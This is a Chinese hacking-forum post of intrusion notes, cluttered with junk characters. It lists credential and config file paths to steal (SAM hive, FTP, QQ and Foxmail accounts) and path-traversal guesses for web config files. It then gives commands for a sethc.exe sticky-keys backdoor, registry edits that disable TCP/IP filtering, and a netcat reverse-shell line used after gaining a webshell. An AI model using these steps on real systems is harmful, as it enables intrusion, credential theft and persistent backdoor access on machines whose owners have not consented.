: x* @  a5 m$ W1 OC:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
* ?( n( g, l+ r- PC:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
* Q: M; V: {% x" |# r' O/ Mc:\CMailServer\config.ini
c:\program files\CMailServer\config.ini
! Z* k& e* S; |9 q8 D, Zc:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
8 L4 ~) A2 ~% r' v( o# u6 bc:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
9 j# t6 E7 R/ _, m8 o6 N9 @c:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
: t1 ?/ u! e9 e  B; Dc:\Apache2\php\license.txt
C:\Program Files\Apache Group\Apache2\bin\Apache.exe
( q  h0 D& B3 H3 y/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
( X: s5 V& b3 X7 ^1 h% |c:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
* E1 d0 x: ~# H6 Ac:\Program Files\Tencent\qq\qq.exe
3 ]- d3 Y& C# @' uc:\Program Files\Tencent\qq\bin\qq.exe
1 ]( u; q- E/ e: r9 v; r  |; L+ ^c:\Program Files\Tencent\qq2009\qq.exe
c:\Program Files\Tencent\qq2008\qq.exe
% {* U7 D+ ^, s. mc:\Program Files\Tencent\qq2010\bin\qq.exe
c:\Program Files\Tencent\qq\Users\All Users\Registry.db
; F! H& P7 P( l5 Y7 TC:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmal\Foxmail.exe
C:\Program Files\Foxmal\accounts.cfg
C:\Program Files\tencent\Foxmal\Foxmail.exe
: V- E2 a, D# y4 SC:\Program Files\tencent\Foxmal\accounts.cfg
, G) {1 g- {$ w  t/ K8 E* p6 |8 P; kC:\Program Files\LeapFTP 3.0\LeapFTP.exe
0 x( K+ U8 o! K2 fC:\Program Files\LeapFTP\LeapFTP.exe
, e  U& \3 e. R, |* s* |( w1 w* Pc:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
: W1 }7 i6 _. a7 z% _' Rc:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
  W. h" ~* y% z9 e5 U- k, gc:\Program Files\tencent\QQGAME\readme.txt
9 @! }( X/ V. X" X. e/ YC:\Program Files\StormII\Storm.exe
( b+ `: r* ^4 _: }; u& b+ t. {
3.网站相对路径:

+ G8 U7 i0 e2 W, d7 M/config.php
../../config.php
( Q' P0 Z$ C$ L3 q+ G../config.php
../../../config.php
( ]$ R1 H8 b/ f/ d) C, r7 J/config.inc.php
& d  W3 j& d& M% h./config.inc.php
& q. D- E  D1 H) J../../config.inc.php
; c! J. _' B$ |% Q; T. p, }# ?../config.inc.php
0 D4 Z9 e) V0 [: ?# F../../../config.inc.php
/conn.php
6 Z  v# d' D4 v* ~; a* c./conn.php
) n# d% N( i- d+ `- T../../conn.php
../conn.php
, [7 \, P% t/ t/ B' s, ^2 Y2 z../../../conn.php
! U( A. ]: [; C, ~- _/conn.asp
./conn.asp
../../conn.asp
3 z9 R; ?1 m1 K! p; h3 {../conn.asp
../../../conn.asp
0 ~6 F& J9 z0 D: A/ U  n! ]/config.inc.php
./config.inc.php
, T% S: Q( _) l& {( n../../config.inc.php
../config.inc.php
../../../config.inc.php
/config/config.php
( p1 Q. _# ^) M' Q# j- l9 Z../../config/config.php
../config/config.php
! P. ^+ k, m# f  W../../../config/config.php
  `" D; h, {- ]& {+ T4 s/config/config.inc.php
, O# r. I; P  y# Q0 \" `( D./config/config.inc.php
../../config/config.inc.php
$ C5 }/ J1 l1 ?3 ]../config/config.inc.php
- \6 x+ P' i# }: F; E  Q../../../config/config.inc.php
/config/conn.php
./config/conn.php
../../config/conn.php
, O/ G& _0 c9 y../config/conn.php
& H% V+ _# }  _2 U% y../../../config/conn.php
/config/conn.asp
./config/conn.asp
../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
) z; C2 ~# Z; Z/ x0 [7 ]5 O1 n./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/data/config.php
../../data/config.php
../data/config.php
../../../data/config.php
1 Z4 ^3 u7 Q- _% v( V# @( r& @+ A. e/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
# Z+ \5 f" B* z1 k2 b; t, ^../data/config.inc.php
% x9 R$ A; K. q4 Q" c  K$ d( I../../../data/config.inc.php
/data/conn.php
./data/conn.php
2 F* p, m/ e# \% T$ n../../data/conn.php
; \: G3 D. X& u2 @% [- j../data/conn.php
../../../data/conn.php
/data/conn.asp
./data/conn.asp
# A" _, o! c3 L9 N../../data/conn.asp
. [) q$ y4 P  ^9 S../data/conn.asp
../../../data/conn.asp
0 T& n# h# O& P/ `, n& T6 @/data/config.inc.php
& q- O! @  e/ q9 |( J./data/config.inc.php
# G& D# r! F+ ^' y../../data/config.inc.php
../data/config.inc.php
3 j! ?# ^! ^. R/ b../../../data/config.inc.php
0 S- L3 V( v& P/include/config.php
../../include/config.php
/ d' c5 |% a2 X. X8 ]1 z../include/config.php
../../../include/config.php
/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
../include/config.inc.php
4 g5 \9 e9 P% g../../../include/config.inc.php
/include/conn.php
./include/conn.php
../../include/conn.php
7 N: ~; h( W% {* d& A/ N../include/conn.php
" [& @" K6 g. R- ~; |../../../include/conn.php
6 r! F7 I* g5 e/include/conn.asp
/ g3 {8 _: a: O' H" c* J1 |./include/conn.asp
7 O- R; O0 B2 Y0 A+ A../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
2 U7 ~3 Y) V* n. o/ l+ v/include/config.inc.php
6 j3 c5 b7 x1 N2 Q4 X2 |' r" l./include/config.inc.php
9 R  l  Q5 R: ]9 m6 ~2 Y2 e../../include/config.inc.php
../include/config.inc.php
" Z. v: W/ U! m1 F0 k* \, G../../../include/config.inc.php
/inc/config.php
../../inc/config.php
../inc/config.php
../../../inc/config.php
/ ~/ P& S5 c- G/inc/config.inc.php
./inc/config.inc.php
$ p( a5 k3 e' l: k! G3 ^/ {! S../../inc/config.inc.php
! _+ V( n) u, _, F( s) O9 y../inc/config.inc.php
" E( Q9 X$ w- p& O../../../inc/config.inc.php
/inc/conn.php
- h* _- [# R( E./inc/conn.php
1 @+ E$ Y% h/ }9 O% P  K7 m../../inc/conn.php
* J7 Q1 ]& Y) D, S6 n2 C& D3 |* w../inc/conn.php
' [% |5 c1 v: q. w% T9 r" G) H  }3 U../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
  b! r7 p! h" g. B../../inc/conn.asp
6 X5 g4 h: R9 T6 w* d$ X$ g../inc/conn.asp
../../../inc/conn.asp
- O& _. H5 V+ ?( S4 Y/inc/config.inc.php
$ E- K0 c  [0 l* \/ @./inc/config.inc.php
../../inc/config.inc.php
../inc/config.inc.php
2 S/ n) ?% ?8 P$ X% ]../../../inc/config.inc.php
: _& V$ C7 W: _% z  O/index.php
" Y! w2 j% L/ O# A9 M./index.php
) T$ s: Y* A: A) ?* N- G6 ~../../index.php
6 b/ x3 H8 O1 H" R5 a9 ]- n../index.php
../../../index.php
/index.asp
( F) v9 p6 u; s' X9 y9 s% M5 Z./index.asp
../../index.asp
0 H4 K9 U6 ^" M/ f/ ^# P0 N& n8 F../index.asp
0 h; Y7 F% s  |6 H! b& v../../../index.asp
替换SHIFT后门
/ @: h) i) l! J- `- C　attrib c:\windows\system32\sethc.exe -h -r -s

; h4 ]& m$ y: r8 r6 N9 U　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
9 G( t9 w2 c8 j2 U" [1 j4 ^
　　del c:\windows\system32\sethc.exe

　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
4 k+ u1 e, c: C
) @# B/ |" t, x2 V7 ?% G　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
1 w& g3 @; F6 L1 _
　　attrib c:\windows\system32\sethc.exe +h +r +s

　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
去除TCPIP筛选
& _+ g/ Q/ s" L& S2 ~TCP/IP筛选在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- Q" Y  R! V8 l4 T& b
分别用
7 e' g. S/ ?7 g/ Xregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) S8 Z" N& k0 n1 C) M/ J/ g1 Yregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
7 q+ h3 |4 k& f9 K! k, `& V1 m
然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000

- @$ r; D: O' m* B8 q再将以上三个文件分别用
regedit -s D:\a.reg
regedit -s D:\b.reg
3 k" N; a2 T9 j% g% Zregedit -s D:\c.reg
导入注册表即可

# O0 Q) i6 K6 T& ?5 u1 ~webshell提权小技巧
: [; o/ G7 l/ L. n  o' Bcmd路径:
5 V, ?5 _7 L8 R- ]5 R, Yc:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell：
- e6 B' }( M+ x9 |: E+ F  e"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。

而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
1 b$ m. F! _5 B) J% t命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
) x" a+ w9 J0 n: N4 P却能成功。。
这个不是重点
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2